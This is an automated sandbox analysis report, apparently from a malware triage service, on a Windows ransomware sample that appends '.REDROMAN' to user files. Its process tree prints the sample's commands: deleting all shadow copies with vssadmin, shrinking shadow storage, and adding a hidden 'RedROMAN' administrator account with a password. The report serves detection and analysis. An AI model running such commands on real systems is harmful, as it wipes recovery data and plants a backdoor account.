Resubmissions
19/11/2020, 14:39
201119-59epbrqadx 1019/11/2020, 14:22
201119-ff99dc42e6 1019/11/2020, 14:16
201119-298y5e8ncj 9Analysis
-
max time kernel
32s -
max time network
106s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19/11/2020, 14:39
Static task
static1
Behavioral task
behavioral1
Sample
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
Resource
win10v20201028
General
-
Target
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
-
Size
1.8MB
-
MD5
10d7151b9ee53b8da8ee6f85001ffb20
-
SHA1
76d33ef58ea7b012342d975d871db64840da9675
-
SHA256
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093
-
SHA512
1c6d2d7f509b462b5d48db61817ee42a7204d10141c59394eb190d0dba733b831a6344bb85197dfac358939379e640c9f38732d376e28f92e187806ca574d10f
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\RepairFind.png.REDROMAN f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe File created C:\Users\Admin\Pictures\RenameApprove.crw.REDROMAN f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\DenyClose.tiff f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe File created C:\Users\Admin\Pictures\DenyClose.tiff.REDROMAN f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe File created C:\Users\Admin\Pictures\ExportInvoke.crw.REDROMAN f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe File created C:\Users\Admin\Pictures\SkipUnpublish.tif.REDROMAN f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe -
Modifies service 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4596 vssadmin.exe 4360 vssadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1364 powershell.exe 1364 powershell.exe 1364 powershell.exe 184 powershell.exe 184 powershell.exe 184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1364 powershell.exe Token: SeDebugPrivilege 184 powershell.exe Token: SeBackupPrivilege 4496 vssvc.exe Token: SeRestorePrivilege 4496 vssvc.exe Token: SeAuditPrivilege 4496 vssvc.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1160 wrote to memory of 1364 1160 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe 70 PID 1160 wrote to memory of 1364 1160 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe 70 PID 1160 wrote to memory of 184 1160 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe 78 PID 1160 wrote to memory of 184 1160 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe 78 PID 184 wrote to memory of 3492 184 powershell.exe 80 PID 184 wrote to memory of 3492 184 powershell.exe 80 PID 3492 wrote to memory of 4360 3492 cmd.exe 82 PID 3492 wrote to memory of 4360 3492 cmd.exe 82 PID 3492 wrote to memory of 4596 3492 cmd.exe 86 PID 3492 wrote to memory of 4596 3492 cmd.exe 86 PID 3492 wrote to memory of 4628 3492 cmd.exe 87 PID 3492 wrote to memory of 4628 3492 cmd.exe 87 PID 4628 wrote to memory of 4648 4628 net.exe 88 PID 4628 wrote to memory of 4648 4628 net.exe 88 PID 3492 wrote to memory of 4672 3492 cmd.exe 89 PID 3492 wrote to memory of 4672 3492 cmd.exe 89 PID 4672 wrote to memory of 4692 4672 net.exe 90 PID 4672 wrote to memory of 4692 4672 net.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -WindowStyle Hidden get-wmiobject win32_computersystem | "fl model"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Process C:\ProgramData\amdkey.bat -Verb runas2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\amdkey.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:4360
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB4⤵
- Interacts with shadow copies
PID:4596
-
-
C:\Windows\system32\net.exenet user /add RedROMAN p4zzaub71h4⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add RedROMAN p4zzaub71h5⤵PID:4648
-
-
-
C:\Windows\system32\net.exenet localgroup administrators RedROMAN /add4⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators RedROMAN /add5⤵PID:4692
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:4496